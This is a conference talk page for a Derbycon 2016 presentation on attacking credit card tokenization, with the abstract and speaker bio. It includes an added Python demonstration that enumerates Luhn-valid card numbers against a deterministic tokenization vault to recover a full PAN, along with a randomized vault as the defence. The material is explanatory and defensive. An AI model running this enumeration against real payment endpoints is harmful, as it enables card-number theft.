Breaking Credit Card Tokenization Without Cryptanalysis - Tim MalcomVetter Derbycon 2016 (Hacking Illustrated Series InfoSec Tutorial Videos)

Breaking Credit Card Tokenization Without Cryptanalysis
Tim MalcomVetter
Derbycon 2016

Credit card tokenization is a very popular antidote to costly and time-consuming PCI regulations, but are all implementations equally secure? Early studies on tokenization focused on cryptanalysis of the token generation process, especially when early implementations sought to create 16-digit numeric tokens to satisfy constraints in legacy commerce systems. Fast-forward to 2016: most of those problems no longer exist; however, anecdotes from consulting with Fortune 500s suggest that other insecure properties not involving crypto can vary and emerge in tokenization systems. This talk digs into several sanitized examples from consulting engagements which reduce "PCI Compliant" credit card tokenization from "silver bullet" to "speed bump" status when big-picture security controls are missing. Specifically: abuse of separation of duties by rogue partial insiders via public APIs commonly found in e-commerce applications; discovery of accidental side channels of critical information flow, such as timing analysis or response differentiation, which can be abused to reveal full PANs (primary account numbers); whether DevOps cultures could promote rogue admins abusing tokenization presentation logic implemented in JavaScript; and, for good measure, some common programming defects which at best render tokenization pointless and at worst could allow a breach. With each example, we'll look at potential solutions.
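The abstract's "rogue partial insider with a public API" and "response differentiation reveals full PANs" points combine into one concrete failure mode. The Python below is an added illustration written for this page, not code or a case from the talk: a constructed tokenization vault whose tokenize() call is deterministic (the same PAN always yields the same token) and reachable by anyone who can submit a card. An attacker who sees a masked PAN (BIN and last four, as printed on receipts and order screens) and holds the matching token (tokens are routinely treated as non-sensitive) enumerates the Luhn-valid candidates, tokenizes each, and compares the returned token: the first match is the full PAN. A second vault that mints a fresh random token per call and answers identically for new and previously seen PANs gives the same probes nothing to compare. The mask format, vault classes, token format and test PAN are all assumptions of this example.

```python
"""Added illustration (not from the talk): why a deterministic, publicly
reachable tokenize() call is a PAN-equality oracle, and how a randomized
vault removes it. All vault behaviour and data below are constructed."""
import itertools
import secrets


def luhn_ok(pan: str) -> bool:
    """Luhn mod-10 check. Every real PAN passes it, so it prunes the search
    space by a factor of ten before a single request is sent."""
    total = 0
    for i, ch in enumerate(reversed(pan)):
        d = int(ch)
        if i % 2 == 1:  # every second digit from the right is doubled
            d = d * 2 - 9 if d > 4 else d * 2
        total += d
    return total % 10 == 0


class DeterministicVault:
    """Weak design (constructed): the same PAN always yields the same token.
    Anyone who can call tokenize() and already holds one token can test
    PAN guesses for equality against it."""

    def __init__(self):
        self._by_pan = {}

    def tokenize(self, pan: str) -> dict:
        tok = self._by_pan.get(pan)
        if tok is None:
            tok = "tok_" + secrets.token_hex(8)
            self._by_pan[pan] = tok
        return {"token": tok}


class RandomizedVault:
    """Hardened design (constructed): every call mints a fresh random token
    and the response is identical whether or not the PAN was seen before,
    so a caller learns nothing by comparing results."""

    def __init__(self):
        self._by_token = {}

    def tokenize(self, pan: str) -> dict:
        tok = "tok_" + secrets.token_hex(8)
        self._by_token[tok] = pan
        return {"token": tok}


def candidates(masked: str):
    """Yield every Luhn-valid 16-digit PAN matching a mask such as
    '4111 11** **** 1111' ('*' marks an unknown digit)."""
    pan = masked.replace(" ", "")
    if len(pan) != 16:
        raise ValueError("expected a 16-digit mask")
    holes = [i for i, c in enumerate(pan) if c == "*"]
    chars = list(pan)
    for digits in itertools.product("0123456789", repeat=len(holes)):
        for i, d in zip(holes, digits):
            chars[i] = d
        cand = "".join(chars)
        if luhn_ok(cand):
            yield cand


def recover_pan(vault, masked: str, known_token: str):
    """Probe the vault with each candidate; return (pan, probes) on a token
    match, or (None, probes) if the oracle never fires."""
    probes = 0
    for cand in candidates(masked):
        probes += 1
        if vault.tokenize(cand)["token"] == known_token:
            return cand, probes
    return None, probes


if __name__ == "__main__":
    victim = "4111111106001111"   # constructed, Luhn-valid test PAN
    mask = "41111111****1111"     # masked PAN with four unknown digits

    weak = DeterministicVault()
    token = weak.tokenize(victim)["token"]   # the merchant stores the card once
    print("deterministic vault:", recover_pan(weak, mask, token))

    strong = RandomizedVault()
    token = strong.tokenize(victim)["token"]
    print("randomized vault:   ", recover_pan(strong, mask, token))
```

The demo mask leaves four digits unknown so it runs in a fraction of a second; a real BIN-plus-last-four mask leaves six, which Luhn cuts to about 100,000 probes, still trivial against an unthrottled tokenize endpoint. Two checks follow from this for any tokenization deployment: confirm that tokenizing the same PAN twice does not return a comparable result to an unprivileged caller, and treat the volume of tokenize calls per client as a detection signal, since the attack is indistinguishable from legitimate traffic except by count.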

Tim MalcomVetter (@malcomvetter) has fifteen years in defending, building, and breaking systems. Tim is the Director of the Red Team at the world's largest commercial entity, Walmart (@WalmartLabs), where he is privileged to lead a team of very skilled Red Team engineers testing one of the largest environments in the world (over 130 million IP addresses, petabytes of Big Data, thousands of applications, and millions upon millions of internal and external users). Before that, Tim was a Principal Consultant in Optiv's Software Security Group, their top offensive security blogger during his tenure, performing penetration tests and code reviews on web apps, web services, mobile apps, point of sale systems, proprietary TCP socket services, and even fuel pumps and car washes (yes, fuel pumps!). Before that, Tim led agile e-commerce dev teams, led PCI compliance projects at Level 1 merchants, and was a security generalist wearer-of-many-hats. Tim has presented at numerous venues, including Black Hat USA Tools Arsenal, BSides, ArchC0N, ShowMeCon, Secure World Expo, and several developer conferences, and Tim also donates time to coach the Missouri S&T Collegiate Cyber-Defense Team. Tim has several security certifications, a master's in information assurance, and held a doctoral study fellowship at Missouri S&T.


Copyright 2020, IronGeek
Louisville / Kentuckiana Information Security Enthusiast